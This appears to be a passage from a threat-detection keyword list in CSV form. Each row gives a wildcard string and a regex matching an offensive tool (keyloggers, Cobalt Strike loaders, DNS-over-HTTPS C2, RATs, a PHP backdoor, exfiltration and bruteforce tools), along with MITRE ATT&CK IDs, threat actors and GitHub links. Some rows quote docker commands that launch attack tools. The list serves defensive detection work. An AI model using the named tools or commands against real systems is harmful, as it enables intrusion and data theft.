"*DNS-Tunnel-Keylogger*",".{0,1000}DNS\-Tunnel\-Keylogger.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","1","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*dnstwist*",".{0,1000}dnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*dnsx -silent -d * -w dns_worldlist.txt*",".{0,1000}dnsx\s\-silent\s\-d\s.{0,1000}\s\-w\sdns_worldlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dnsx -silent -d domains.txt -w jira*grafana*jenkins*",".{0,1000}dnsx\s\-silent\s\-d\sdomains\.txt\s\-w\sjira.{0,1000}grafana.{0,1000}jenkins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Do you want Ghauri set it for you ? [Y/n]*",".{0,1000}Do\syou\swant\sGhauri\sset\sit\sfor\syou\s\?\s\[Y\/n\].{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Do you want to launch the payload from x86 Powershell?*",".{0,1000}Do\syou\swant\sto\slaunch\sthe\spayload\sfrom\sx86\sPowershell\?.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Do you want to skip test payloads specific for other DBMSes?*",".{0,1000}Do\syou\swant\sto\sskip\stest\spayloads\sspecific\sfor\sother\sDBMSes\?.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*do_attack(*",".{0,1000}do_attack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*do_bypassuac*",".{0,1000}do_bypassuac.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*do_metasploit(*",".{0,1000}do_metasploit\(.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*do_pyinject*",".{0,1000}do_pyinject.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*do_socksoverrdp(*127.0.0.1*",".{0,1000}do_socksoverrdp\(.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*do_socksproxy(* listen_ip = '127.0.0.1'*",".{0,1000}do_socksproxy\(.{0,1000}\slisten_ip\s\=\s\'127\.0\.0\.1\'.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*do_startpscmd(*serverscript.ps1*",".{0,1000}do_startpscmd\(.{0,1000}serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" 
"*Do-AltShiftEsc*",".{0,1000}Do\-AltShiftEsc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Do-AltShiftTab*",".{0,1000}Do\-AltShiftTab.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*doc/extras/HACKING.*",".{0,1000}doc\/extras\/HACKING\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*docker * covenant*",".{0,1000}docker\s.{0,1000}\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - 
T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker * --name elite *",".{0,1000}docker\s.{0,1000}\s\-\-name\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker * -t elite *",".{0,1000}docker\s.{0,1000}\s\-t\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker build . -t torat*",".{0,1000}docker\sbuild\s\.\s\-t\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*docker build -t hiphp:latest*",".{0,1000}docker\sbuild\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*docker build -t legba .*",".{0,1000}docker\sbuild\s\-t\slegba\s\..{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*docker build -t maitm *",".{0,1000}docker\sbuild\s\-t\smaitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*docker build -t merlin-agent:*-linux*",".{0,1000}docker\sbuild\s\-t\smerlin\-agent\:.{0,1000}\-linux.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*docker build -t rmg .*",".{0,1000}docker\sbuild\s\-t\srmg\s\..{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to 
identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*docker run */pacu:latest*",".{0,1000}docker\srun\s.{0,1000}\/pacu\:latest.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*docker run */usr/src/rde1*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rde1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*docker run */usr/src/rec2*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rec2.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*docker run -it --rm local/pspy*",".{0,1000}docker\srun\s\-it\s\-\-rm\slocal\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*docker run -it 
torat*",".{0,1000}docker\srun\s\-it\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*docker run legba*",".{0,1000}docker\srun\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*docker run -p * spring4shell",".{0,1000}docker\srun\s\-p\s.{0,1000}\sspring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*docker run --rm -ti maitm -*",".{0,1000}docker\srun\s\-\-rm\s\-ti\smaitm\s\-.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*docker run sitadel*",".{0,1000}docker\srun\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*docker* donut *",".{0,1000}docker.{0,1000}\sdonut\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*docker*/hiphp:latest*",".{0,1000}docker.{0,1000}\/hiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*docker/gsocket*",".{0,1000}docker\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*docker-compose logs wiresocks*",".{0,1000}docker\-compose\slogs\swiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*DockerPwn*",".{0,1000}DockerPwn.{0,1000}","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. 
","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","211","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z" "*DocPlz-main.zip*",".{0,1000}DocPlz\-main\.zip.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*DocsPLZ\DocsPLZ.*",".{0,1000}DocsPLZ\\DocsPLZ\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*docstring for bruteforce.*",".{0,1000}docstring\sfor\sbruteforce\..{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*DoEvil()*",".{0,1000}DoEvil\(\).{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Do-Exfiltration.ps1*",".{0,1000}Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Doge-Loader*xor.go*",".{0,1000}Doge\-Loader.{0,1000}xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*DoHC2*BeaconConnector*",".{0,1000}DoHC2.{0,1000}BeaconConnector.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2.exe*",".{0,1000}DoHC2\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2.py*",".{0,1000}DoHC2\.py.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.*",".{0,1000}DoHC2Runner\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.exe*",".{0,1000}DoHC2Runner\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.pdb*",".{0,1000}DoHC2Runner\.pdb.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
